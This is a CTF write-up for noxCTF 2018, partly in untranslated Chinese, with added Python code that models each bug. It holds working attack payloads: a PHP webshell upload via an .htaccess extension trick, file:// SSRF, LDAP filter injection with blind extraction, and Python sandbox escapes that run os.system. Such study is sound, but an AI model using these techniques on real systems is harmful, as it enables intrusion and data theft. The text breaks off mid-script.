noxctfwp

A noob's notes from scratching at a few of the challenges.

web

reference

Looking at the JS, there is a check on whether the request comes from Google.

Intercept the request, change the Referer to google.com, and you get a base64 string; decode it. Free points.

MyFileUploader

File upload, then get a shell.

I went straight to scanning directories and found /upload; opening it, there was a file called don't open it.

Opening that, it's an .htaccess:

Options +Indexes
AddType application/x-httpd-php .cyb3r

那传 eeee.cyber

提示后缀不是 jpg png 等

这里upload能看到其他人传的文件 发现 xxx.cyber.jpg%00

我仿照也改了下 上传但ls不行 我又试了个phpinfo()发现可以解析的

最后蚁剑连上了

This bypass felt a bit odd to me, though. Isn't it usually xxx.cyb3r%00.jpg (nginx<8.03)???

Uploaded that way, the %00 turns into %2500, and clicking the file in the directory listing just 404s.

After the contest I saw that xxx.png.cyb3r works too.
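To make that last observation concrete, here is an added example, my own code rather than anything from the challenge or the original post, that mimics Apache mod_mime's rule for files with several extensions (unrecognised extensions are skipped, and among the ones that map to a type the rightmost wins) and contrasts a check that only looks for an image extension somewhere in the name with a hardened one. The MIME table, and the assumption that the challenge's filter was of the first kind, are mine.

```python
import re
import secrets

# Extension -> MIME type as Apache's mod_mime sees it once the challenge's
# .htaccess (AddType application/x-httpd-php .cyb3r) is merged with a few
# stock mime.types entries. The image rows are assumed defaults.
MIME_TYPES = {
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "png": "image/png",
    "gif": "image/gif",
    "php": "application/x-httpd-php",
    "cyb3r": "application/x-httpd-php",  # from the .htaccess on the page
}
PHP_TYPE = "application/x-httpd-php"
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}


def apache_effective_type(filename):
    """Mimic mod_mime's rule for files with several extensions: every
    dot-separated component after the basename is examined left to right,
    unrecognised components are ignored, and among the ones that map to a
    MIME type the rightmost wins."""
    mime = None
    for ext in filename.split(".")[1:]:
        mime = MIME_TYPES.get(ext.lower(), mime)
    return mime


def naive_is_image(filename):
    """What the challenge appears to check (assumption): an image extension
    occurs somewhere in the name. xxx.png.cyb3r passes, and Apache runs it."""
    lowered = filename.lower()
    return any("." + ext in lowered for ext in ALLOWED_IMAGE_EXT)


def accept_upload(filename):
    """Hardened check. Returns the name to store the file under, or None to
    reject. Only the final extension counts, it must be allow-listed, and the
    stored basename is generated server side so no user-controlled extension
    (including a %00-truncated one) ever reaches the filesystem."""
    if re.search(r"[\x00-\x1f/\\]", filename):   # control chars, path parts
        return None
    name, dot, ext = filename.rpartition(".")
    if not dot or not name:
        return None
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return None
    return secrets.token_hex(8) + "." + ext


def stored_is_executable(filename):
    """Would Apache hand this stored file to PHP?"""
    return apache_effective_type(filename) == PHP_TYPE


if __name__ == "__main__":
    for f in ("xxx.png.cyb3r", "xxx.cyb3r.jpg", "shell.cyb3r", "photo.jpg"):
        print(f, apache_effective_type(f), naive_is_image(f), accept_upload(f))
```

xxx.png.cyb3r is handed to PHP because .cyb3r is the rightmost recognised extension, while xxx.cyb3r.jpg is served as an image, which is the opposite of what a substring-style filter assumes. The hardened version never trusts the uploaded name at all: it validates only the final extension and stores the file under a generated name.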

hiddenDOM

...I was one step away on this one; I'm not that familiar with JS...

The site claims it will find hidden elements in a web page, and there is a field for a URL, so it's basically SSRF.

Try its own site first: some things are echoed back.

The source gives the absolute path of the flag, which immediately suggests the file protocol:

?target=file:///var/www/html/flag.txt

But it returned nothing. That means the flag doesn't contain the word "hidden"; we need to read the whole file rather than only the lines that contain "hidden".

There is some JS in the source; beautified:

var _0x3bc3 = ["main_form", "getElementById", "input", "createElement", "name", "expression", "setAttribute", "type", "text", "placeholder", "/<[^<>]{1,}hidden[^<>]{1,}>/"];
var _frss = document[_0x3bc3[1]](_0x3bc3[0]);
var _xEger = document[_0x3bc3[3]](_0x3bc3[2]);
_xEger[_0x3bc3[6]](_0x3bc3[4], _0x3bc3[5]);
_xEger[_0x3bc3[6]](_0x3bc3[7], _0x3bc3[8]);
_xEger[_0x3bc3[6]](_0x3bc3[9], _0x3bc3[10])

Note the expression:

<input name="expression" type="text" placeholder="/<[^<>]{1,}hidden[^<>]{1,}>/">

expression is a regular expression, and it is what keeps the contents of flag.txt from being shown.

Change it a bit and try, for instance ?expression=/[^<>]{1}id[^<>]{1}>/&target=http://chal.noxale.com:5588

Here the default hidden was replaced with id and the response changed, which confirms the guess: we control the regex.

Honestly, anyone comfortable with JS, or with some experience, could probably tell from the challenge description alone that it's a regex.

Finally: ?target=file:///var/www/html/flag.txt&expression=/.*/
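The two bugs that combine here, a fetcher that accepts file:// and a regex taken from the client, are easy to model. The following is an added example of mine, not the challenge's source (which is not on this page): a stand-in for the service with both bugs, next to a version that removes them. The resources dictionary, the flag value and the hardened function are all constructed.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed stand-in for what the service can reach: its own page and the
# flag file at the path quoted above. The flag value is made up.
RESOURCES = {
    "http://chal.noxale.com:5588/": (
        '<html><body><div id="hidden_elements" hidden>secret div</div>'
        '<input type="hidden" name="csrf" value="abc"></body></html>'
    ),
    "file:///var/www/html/flag.txt": "noxctf{example_flag_value}\n",
}
DEFAULT_EXPRESSION = "/<[^<>]{1,}hidden[^<>]{1,}>/"   # the placeholder from the page


def fetch(target):
    """Pretend to fetch a URL; a real service would use an HTTP client here."""
    return RESOURCES.get(target, "")


def compile_js_literal(expression):
    """Turn the /pattern/ form the input field expects into a Python regex."""
    if len(expression) < 2 or expression[0] != "/" or expression[-1] != "/":
        raise ValueError("expression must look like /.../")
    return re.compile(expression[1:-1])


def find_hidden_vulnerable(target, expression=DEFAULT_EXPRESSION):
    """Model of the challenge: any scheme is fetched and the client's regex is
    applied, so file:// together with /.*/ returns the whole file."""
    return compile_js_literal(expression).findall(fetch(target))


def target_is_allowed(target):
    """http(s) only, and no IP-literal host that is loopback, private,
    link-local or otherwise non-global. A DNS name passes here; a real service
    must resolve it and re-check (and pin) the answer before connecting."""
    parts = urlparse(target)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        return ipaddress.ip_address(parts.hostname).is_global
    except ValueError:            # not an IP literal, i.e. a DNS name
        return True


def find_hidden_hardened(target, expression=None):
    """Same feature with both bugs removed: the regex is fixed server side
    (the client's value is ignored) and the target must pass target_is_allowed."""
    if not target_is_allowed(target):
        raise ValueError("target not allowed: %s" % target)
    return compile_js_literal(DEFAULT_EXPRESSION).findall(fetch(target))
```

With the default expression the flag file yields nothing, exactly as observed; with /.*/ the vulnerable version returns the file. The hardened version rejects the file:// target before anything is fetched and never compiles client input.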

One more note: when you point it at its own site, an extra piece of JS appears:

var _0x2b80 = ["slow", "fadeOut", "#hidden_elements", "click", "#hideArea", "ready", "fadeIn", "#showArea"];
$(document)[_0x2b80[5]](function() {
$(_0x2b80[4])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[1]](_0x2b80[0]);
});
});
$(document)[_0x2b80[5]](function() {
$(_0x2b80[7])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[6]](_0x2b80[0]);
});
});

Beautified, it's roughly:

$(document)["ready"](function() {
$("#hideArea")["click"](function() {
$("#hidden_elements")["fadeOut"]("slow");
});
});
$(document)["ready"](function() {
$("#showArea")["click"](function() {
$("#hidden_elements")["fadeIn"]("slow");
});
});

Since I don't really know JS, I stared at this for ages thinking there was something in it; after the contest a more experienced player said it just toggles that display box. Completely useless.
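Both snippets use the same string-array obfuscation, so beautifying them by hand is mostly index lookups. Here is an added example (my code, not from the page or the challenge) that does that mechanically: it finds the var _0x... = [...] array, inlines every _0x...[i] reference, and rewrites obj["ident"] as obj.ident. It assumes a single array of plain quoted strings, which is all these two snippets need; the two inputs are the snippets quoted above.

```python
import re

# The two obfuscated snippets quoted in the write-up, embedded here as inputs.
SNIPPET_FORM = '''var _0x3bc3 = ["main_form", "getElementById", "input", "createElement", "name", "expression", "setAttribute", "type", "text", "placeholder", "/<[^<>]{1,}hidden[^<>]{1,}>/"];
var _frss = document[_0x3bc3[1]](_0x3bc3[0]);
var _xEger = document[_0x3bc3[3]](_0x3bc3[2]);
_xEger[_0x3bc3[6]](_0x3bc3[4], _0x3bc3[5]);
_xEger[_0x3bc3[6]](_0x3bc3[7], _0x3bc3[8]);
_xEger[_0x3bc3[6]](_0x3bc3[9], _0x3bc3[10])'''

SNIPPET_JQUERY = '''var _0x2b80 = ["slow", "fadeOut", "#hidden_elements", "click", "#hideArea", "ready", "fadeIn", "#showArea"];
$(document)[_0x2b80[5]](function() {
$(_0x2b80[4])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[1]](_0x2b80[0]);
});
});
$(document)[_0x2b80[5]](function() {
$(_0x2b80[7])[_0x2b80[3]](function() {
$(_0x2b80[2])[_0x2b80[6]](_0x2b80[0]);
});
});'''


def extract_string_array(js):
    """Locate `var _0xNNNN = [ ... ];` and return (name, strings, start, end).
    A hand-rolled scanner is used instead of a regex because the strings
    themselves may contain ']' (the regex literal in the first snippet does)."""
    m = re.search(r"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[", js)
    if not m:
        return None
    items, current, quote, i = [], None, None, m.end()
    while i < len(js):
        ch = js[i]
        if quote:                          # inside a string literal
            if ch == "\\":                 # keep escape sequences verbatim
                current += js[i:i + 2]
                i += 2
                continue
            if ch == quote:
                items.append(current)
                current, quote = None, None
            else:
                current += ch
        elif ch in "\"'":
            quote, current = ch, ""
        elif ch == "]":                    # end of the array literal
            break
        i += 1
    end = js.find(";", i)
    return m.group(1), items, m.start(), (end + 1 if end != -1 else i + 1)


def deobfuscate(js):
    """Inline every _0xNNNN[i] reference and turn obj["ident"] into obj.ident."""
    found = extract_string_array(js)
    if found is None:
        return js
    name, strings, start, end = found
    body = js[:start] + js[end:]           # drop the array declaration

    def inline(mm):
        return '"%s"' % strings[int(mm.group(1))]

    body = re.sub(re.escape(name) + r"\[(\d+)\]", inline, body)
    body = re.sub(r'\["([A-Za-z_$][\w$]*)"\]', lambda mm: "." + mm.group(1), body)
    return body.strip()


if __name__ == "__main__":
    print(deobfuscate(SNIPPET_FORM))
    print()
    print(deobfuscate(SNIPPET_JQUERY))
```

The first snippet comes out as document.getElementById("main_form") plus three setAttribute calls, which is how the expression input with its regex placeholder gets created; the second is just the show/hide handlers.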

References
https://rawsec.ml/en/noxCTF-2018-write-ups/#292-python-for-fun-misc
https://github.com/xpinked/ctf-writeups/blob/master/noxCTF18/Web/HiddenDOM/Solution.md
https://www.pwndiary.com/write-ups/noxctf-2018-hiddendom-write-up-web670/

Dictionary of obscure sorrows

LDAP injection. Time to pay my tuition again.

Intro to LDAP and LDAP injection:
https://www.cnblogs.com/bendawang/p/5156562.html

LDAP-specific errors (useful for recognising that it is LDAP):
https://blog.csdn.net/zdwzzu2006/article/details/8550910

For instance the Bad search filter error that 飘零 has mentioned.

LDAP is the Lightweight Directory Access Protocol.

Back to the challenge.

The page has quite a lot of content. Click any link and the URL is /word.php?page=Sonder

Looks a bit like a file read. Try reading itself: /word.php?page=word.php

It returns Query returned empty, which feels more like an empty database query.

So probably not a file read; with some experience, the next thing to try is LDAP injection.

Try the wildcard *

/word.php?page=S* returns normally

/word.php?page=B* gives Query returned empty again

That pretty much confirms LDAP.

If you're not sure, try a bit further:

/word.php?page=*)(objectclass=S* normal

/word.php?page=*)(objectclass=B* Query returned empty

Incidentally, objectClass is a built-in LDAP attribute: every entry must carry an objectClass attribute with at least one value.

OK, direction confirmed; now to find a way to exploit it.

Try requesting without the parameter: http://54.152.220.222/word.php (error-based)

The response is Missing RDN inside ObjectClass(document)

Good, now we know the ObjectClass is document.

Check the reference https://oav.net/mirrors/LDAP-ObjectClasses.html

The document objectclass has these attributes:

commonName
description
seeAlso
l
o
ou
documentTitle
documentVersion
documentAuthor
documentLocation
documentPublisher

If you don't know which one, try them one by one:

GET /word.php?page=*)(cn=* ⇒ Query returned empty
GET /word.php?page=*)(description=* ⇒ Normal response★
GET /word.php?page=*)(seeAlso=*  ⇒ Query returned empty
GET /word.php?page=*)(l=*   ⇒ Query returned empty
GET /word.php?page=*)(o=*   ⇒ Query returned empty
GET /word.php?page=*)(ou=*  ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=*  ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★

Combined with the known flag format noxctf{xxx},

the final payload, a bit like closing the ' in SQL injection:

/word.php?page=*)(description=*noxctf*
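An added example of mine (not the challenge's code, whose LDAP filter is not shown on this page) that reproduces the oracle above against a constructed in-memory directory: a minimal LDAP filter parser and matcher, a model of /word.php that pastes the page parameter into the filter unescaped, the attribute probe loop from the table, and, going beyond the write-up, a blind character-by-character extraction that works even when the page echoes nothing but normal/empty. The attribute the parameter is matched against (documentIdentifier), the entries and the flag value are assumptions.

```python
import re

EMPTY = "Query returned empty"
BAD_FILTER = "Bad search filter"

# Constructed directory. The attribute the `page` parameter is matched against
# is not visible on the page; documentIdentifier (a MUST attribute of the
# document object class) is assumed. Descriptions and the flag are made up.
ENTRIES = [
    {"objectclass": ["document"], "documentidentifier": ["Sonder"],
     "description": ["the realization that each random passerby is living a life as vivid as your own"],
     "documentpublisher": ["noxale"]},
    {"objectclass": ["document"], "documentidentifier": ["Flag"],
     "description": ["noxctf{example_flag}"],
     "documentpublisher": ["noxale"]},
]


def parse_filter(s, i=0):
    """Minimal RFC 4515 parser: (&(...)(...)), (|(...)) and (attr=value) where
    value may contain '*'. Returns (node, index after the closing paren)."""
    if i >= len(s) or s[i] != "(":
        raise ValueError("expected '('")
    i += 1
    if i < len(s) and s[i] in "&|":
        op, children, i = s[i], [], i + 1
        while i < len(s) and s[i] == "(":
            node, i = parse_filter(s, i)
            children.append(node)
        if i >= len(s) or s[i] != ")":
            raise ValueError("unbalanced filter")
        return (op, children), i + 1
    j = s.find(")", i)
    if j == -1 or "=" not in s[i:j]:
        raise ValueError("bad filter item")
    attr, _, value = s[i:j].partition("=")
    return ("=", attr.strip().lower(), value), j + 1


def matches(node, entry):
    """Evaluate a parsed filter against one entry; '*' is a wildcard and the
    comparison is case-insensitive, like caseIgnoreMatch."""
    if node[0] == "&":
        return all(matches(c, entry) for c in node[1])
    if node[0] == "|":
        return any(matches(c, entry) for c in node[1])
    _, attr, pattern = node
    regex = "^" + ".*".join(re.escape(part) for part in pattern.split("*")) + "$"
    return any(re.match(regex, v, re.I) for v in entry.get(attr, []))


def word_php(page):
    """Model of /word.php: the parameter is pasted into the filter unescaped
    and the first hit's description is shown."""
    filt = "(&(objectClass=document)(documentIdentifier=%s))" % page
    try:
        node, end = parse_filter(filt)
        if end != len(filt):
            raise ValueError("trailing characters")
    except ValueError:
        return BAD_FILTER
    hits = [e for e in ENTRIES if matches(node, e)]
    return hits[0]["description"][0] if hits else EMPTY


def probe_attributes(names):
    """The attribute loop from the table above: True when some entry has the
    attribute with a value."""
    return {name: word_php("*)(%s=*" % name) != EMPTY for name in names}


def extract_blind(attr, prefix="noxctf{", alphabet="abcdefghijklmnopqrstuvwxyz0123456789_}"):
    """Beyond the write-up: the normal/empty oracle with a trailing '*' leaks a
    value one character at a time, even when the page shows nothing else."""
    value = prefix
    while not value.endswith("}"):
        for ch in alphabet:
            if word_php("*)(%s=%s%s*" % (attr, value, ch)) != EMPTY:
                value += ch
                break
        else:
            break                         # no character extends the prefix
    return value


if __name__ == "__main__":
    print(probe_attributes(["cn", "description", "documentPublisher"]))
    print(word_php("*)(description=*noxctf*"))
    print(extract_blind("description"))
```

The injected `*)(attr=...` works because the application closes its own `(documentIdentifier=` item with the `)` we supply, and the trailing `))` of the original filter then closes the `&` and our extra item. An unbalanced payload such as `*)` produces the Bad search filter error mentioned earlier, which is the error-based fingerprint.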

References
https://rawsec.ml/en/noxCTF-2018-write-ups/#292-python-for-fun-misc
https://ctftime.org/writeup/10967

misc

python for fun

A Python sandbox challenge, on Python 3. Apparently exploitation differs a bit between 3 and 2, but noob me isn't clear on that yet...

I did this one stupidly: I kept trying to close the ) and comment out the trailing ):, but newlines and indentation made it impossible.

Turns out the input lands in the function's parameter list, so a default-value expression runs when the function is defined and can print directly.

First: you don't even need things like ''.__class__.__base__.

a,b=print("toto") gives output

a,b=print(exec("import os"),eval("os.listdir('.')")) shows a file named FLAG

a,b=print(open("FLAG", "r").read()) reads it

Or

print(__import__('os').listdir())

print(open('FLAG','r').read())

Or

print(__import__("subprocess").check_output(["ls","-la"]))

print(__import__("subprocess").check_output(["cat","FLAG"]))

Or

a=exec('import subprocess'),b=exec("print(subprocess.getoutput('ls'))")

a=exec('import subprocess'),b=exec("print(subprocess.getoutput('cat FLAG'))")

Or

__import__('os').system('cat FLAG')

Since I'm not familiar with this, I'm writing down everything I saw.

python for fun 2

Compared to the first one, a blacklist was added.

You have to search step by step.

Starting from ''.__class__.__base__.__subclasses__():

[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'moduledef'>, <class 'module'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib._installed_safely'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class 
'_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class 'zipimport.zipimporter'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]

I've seen roughly two approaches.

One: find something that can reach sys, then pull in os through it.

From looking around, this works:

''.__class__.__mro__[1].__subclasses__()[104]

Using __init__ to initialize the class and __globals__ to access the global namespace of the module in which the function was defined.

So from this namespace we are able to call sys.

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"]

Then it's easy to import os:

sys works.

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"]

os works.

''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].system("cat FLAG")

The other approach: find a class that carries os directly.

Searching for os, os._wrap_close looks promising.

[].__class__.__base__.__subclasses__()[127].__dict__

[].__class__.__base__.__subclasses__()[127].__init__.__globals__

listdir is in there.

[].__class__.__base__.__subclasses__()[127].__init__.__globals__['system']

There's no shortcut to finding these: dump the whole list and search for os, or dig up earlier write-ups of similar challenges. Doing it by hand is still slow.
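The indexes above ([104], [127]) are specific to the challenge's interpreter build, which is why the search is slow by hand. Here is an added example, my own code and not from the write-up or the challenge, that does the search programmatically in the current interpreter: it greps object.__subclasses__() by name, and walks every subclass's __init__.__globals__ looking for the os module's own namespace (the os._wrap_close route) or for sys (the [104] route), returning os.system without any hard-coded index. It only automates the gadget hunt; it is not a bypass for any particular blacklist.

```python
def list_subclasses():
    """(index, qualified name) for every entry of object.__subclasses__(),
    i.e. the list dumped in the write-up, but searchable."""
    return [(i, "%s.%s" % (cls.__module__, cls.__name__))
            for i, cls in enumerate(object.__subclasses__())]


def grep_subclasses(needle):
    """The 'dump everything and search for os' step as a function."""
    return [(i, name) for i, name in list_subclasses() if needle in name]


def find_globals_containing(*names):
    """First subclass whose __init__ is a Python-level function and whose
    __globals__ (the defining module's namespace) holds all of `names`.
    C-implemented __init__ slots have no __globals__ and are skipped."""
    for cls in object.__subclasses__():
        g = getattr(getattr(cls, "__init__", None), "__globals__", None)
        if g and all(n in g for n in names):
            return cls, g
    return None, None


def get_os_system():
    """os.system without importing os and without a hard-coded index.
    Route 1: the namespace that defines _wrap_close is os.py itself, so
    'system' is right there. Route 2: any module that did `import sys`
    gives sys.modules['os']."""
    cls, g = find_globals_containing("_wrap_close", "system")
    if g is not None:
        return g["system"]
    cls, g = find_globals_containing("sys")
    if g is not None:
        return g["sys"].modules["os"].system
    raise RuntimeError("no usable gadget in object.__subclasses__()")


if __name__ == "__main__":
    print(grep_subclasses("_wrap_close"))    # e.g. [(NNN, 'os._wrap_close')]
    print(get_os_system())                   # <built-in function system>
```

Because every lookup goes through attribute access rather than a literal index, the same code keeps working when the interpreter version, or the set of modules imported before your input runs, shifts the numbering.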

References
https://www.pwndiary.com/write-ups/noxctf-2018-python-for-fun-2-write-up-misc634/
https://rawsec.ml/en/noxCTF-2018-write-ups/#634-python-for-fun-2-misc

Read Between The Lines

Also just missed this one; it didn't occur to me to search for whitespace decoding... too green.

file message.code
message.code: gzip compressed data, was "message", last modified: Fri Jul 20 12:53:57 2018, from Unix

Looked it up: a gzip archive, the common Linux compression format.

Renamed it to tar.gz and extracted it with 7z.

Inside is JSFuck followed by whitespace characters. Looks a bit like Morse, but there are three symbols, so it isn't.

The bytes are space 0x20, tab 0x09 and newline 0x0a.

Ran the JSFuck and got nope. I assumed it was corrupted and needed repairing; only after the contest did I learn that nope was the result...

So it's the whitespace part. This tests search skills; I found a site that decodes it:

https://vii5ard.github.io/whitespace/

Click run and out comes the result.
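Those three bytes are the entire alphabet of the Whitespace language, and every other byte is a comment to a Whitespace interpreter. Here is an added example, my own code and not the decoder site's, with the gzip step folded in: a tiny encoder for the stack-push instruction, an interpreter for the subset needed to print a message (stack ops, arithmetic, output, end; labels, heap and input are left out), and a constructed gzip blob standing in for message.code. The program and its output are made up.

```python
import gzip

S, T, L = " ", "\t", "\n"   # the only three characters Whitespace reads


def ws_number(n):
    """Whitespace number literal: sign (S=+, T=-), binary digits (S=0, T=1), then L."""
    digits = "".join(T if b == "1" else S for b in bin(abs(n))[2:])
    return (S if n >= 0 else T) + digits + L


def ws_push(n):
    return S + S + ws_number(n)      # IMP [Space], command [Space] = push


WS_ADD = T + S + S + S               # IMP [Tab][Space], [Space][Space] = add
WS_MUL = T + S + S + L               # IMP [Tab][Space], [Space][LF]    = multiply
WS_OUTC = T + L + S + S              # IMP [Tab][LF], [Space][Space]    = output char
WS_OUTN = T + L + S + T              # IMP [Tab][LF], [Space][Tab]      = output number
WS_END = L + L + L                   # IMP [LF], [LF][LF]               = end program


def run_whitespace(code):
    """Interpret the subset of Whitespace needed to print a message: push, dup,
    swap, discard, the five arithmetic ops, character/number output and end.
    Labels, heap and input are not implemented (a limitation of this example).
    Any character other than space, tab and newline is ignored, per the spec."""
    code = "".join(ch for ch in code if ch in (S, T, L))
    stack, out, pc = [], [], 0

    def read_number():
        nonlocal pc
        negative = code[pc] == T
        pc += 1
        value = 0
        while code[pc] != L:
            value = value * 2 + (1 if code[pc] == T else 0)
            pc += 1
        pc += 1                                   # consume the terminator
        return -value if negative else value

    while pc < len(code):
        if code[pc] == S:                                      # stack manipulation
            if code[pc + 1] == S:
                pc += 2
                stack.append(read_number())
            elif code[pc + 1:pc + 3] == L + S:                 # dup
                pc += 3
                stack.append(stack[-1])
            elif code[pc + 1:pc + 3] == L + T:                 # swap
                pc += 3
                stack[-1], stack[-2] = stack[-2], stack[-1]
            elif code[pc + 1:pc + 3] == L + L:                 # discard
                pc += 3
                stack.pop()
            else:
                raise ValueError("unsupported stack instruction at %d" % pc)
        elif code[pc:pc + 2] == T + S:                         # arithmetic
            op = code[pc + 2:pc + 4]
            pc += 4
            b, a = stack.pop(), stack.pop()
            if op == S + S:
                stack.append(a + b)
            elif op == S + T:
                stack.append(a - b)
            elif op == S + L:
                stack.append(a * b)
            elif op == T + S:
                stack.append(a // b)
            elif op == T + T:
                stack.append(a % b)
            else:
                raise ValueError("bad arithmetic instruction at %d" % pc)
        elif code[pc:pc + 2] == T + L:                         # I/O
            op = code[pc + 2:pc + 4]
            pc += 4
            if op == S + S:
                out.append(chr(stack.pop()))
            elif op == S + T:
                out.append(str(stack.pop()))
            else:
                raise ValueError("input instructions are not supported")
        elif code[pc:pc + 3] == WS_END:
            break
        else:
            raise ValueError("unsupported instruction at %d" % pc)
    return "".join(out)


# Constructed program: push 100, push 4, add -> 'h'; push 105 -> 'i'; end.
SAMPLE_PROGRAM = ws_push(100) + ws_push(4) + WS_ADD + WS_OUTC + ws_push(105) + WS_OUTC + WS_END

# Constructed stand-in for message.code: a JSFuck-looking prefix (ignored by a
# Whitespace interpreter, as it contains none of the three bytes) followed by
# the program, gzip-compressed as `file` reported.
MESSAGE_CODE = gzip.compress(("[][(![]+[])[+[]]]" + SAMPLE_PROGRAM).encode())


def decode_message(blob):
    """gunzip, then run what is left as Whitespace."""
    return run_whitespace(gzip.decompress(blob).decode())
```

gzip.decompress replaces the rename-to-tar.gz-and-7z step, and the filter on the first line of run_whitespace is why the JSFuck text in front of the real program can simply be left in place.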

References
https://w4.dk/ctf/writeup/2

crypto

Notes on a few RSA challenges.

Chop Suey

Today I ate in a Chinese restaurant and got myself a fortune cookie. These things usually contain a note with a nice sentence or phrase, but mine had numbers in it instead! Can you help me find the meaning of the numbers?

p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229
q = 12640674973996472769176047937170883420927050821480010581593137135372473880595613737337630629752577346147039284030082593490776630572584959954205336880228469
dp = 6500795702216834621109042351193261530650043841056252930930949663358625016881832840728066026150264693076109354874099841380454881716097778307268116910582929
dq = 783472263673553449019532580386470672380574033551303889137911760438881683674556098098256795673512201963002175438762767516968043599582527539160811120550041
c = 24722305403887382073567316467649080662631552905960229399079107995602154418176056335800638887527614164073530437657085079676157350205351945222989351316076486573599576041978339872265925062764318536089007310270278526159678937431903862892400747915525118983959970607934142974736675784325993445942031372107342103852

dp and dq are leaked. I had just seen this on 飘零's blog, so I grabbed the script, tweaked it and it went through.
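With p, q, dp and dq known, neither e nor d is ever needed: decrypt each half with its CRT exponent and recombine with Garner's formula. The following is an added example of my own, not the script the post refers to; it runs on the challenge values quoted above and checks itself on a toy key first. The toy parameters (p=61, q=53, e=17, m=65) are constructed.

```python
def rsa_crt_decrypt(c, p, q, dp, dq):
    """RSA decryption from the CRT private components alone.
    m1 = c^dp mod p, m2 = c^dq mod q, then Garner:
    m = m2 + q * ((m1 - m2) * q^-1 mod p)."""
    m1 = pow(c, dp, p)
    m2 = pow(c, dq, q)
    qinv = pow(q, -1, p)                     # modular inverse, Python 3.8+
    h = (qinv * (m1 - m2)) % p
    return m2 + h * q


def int_to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def toy_key():
    """Constructed textbook key: p=61, q=53, e=17, d=2753, so dp=53, dq=49."""
    p, q, e = 61, 53, 17
    d = pow(e, -1, (p - 1) * (q - 1))
    return p, q, e, d % (p - 1), d % (q - 1)


# Challenge values from the fortune cookie, as quoted above.
P = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229
Q = 12640674973996472769176047937170883420927050821480010581593137135372473880595613737337630629752577346147039284030082593490776630572584959954205336880228469
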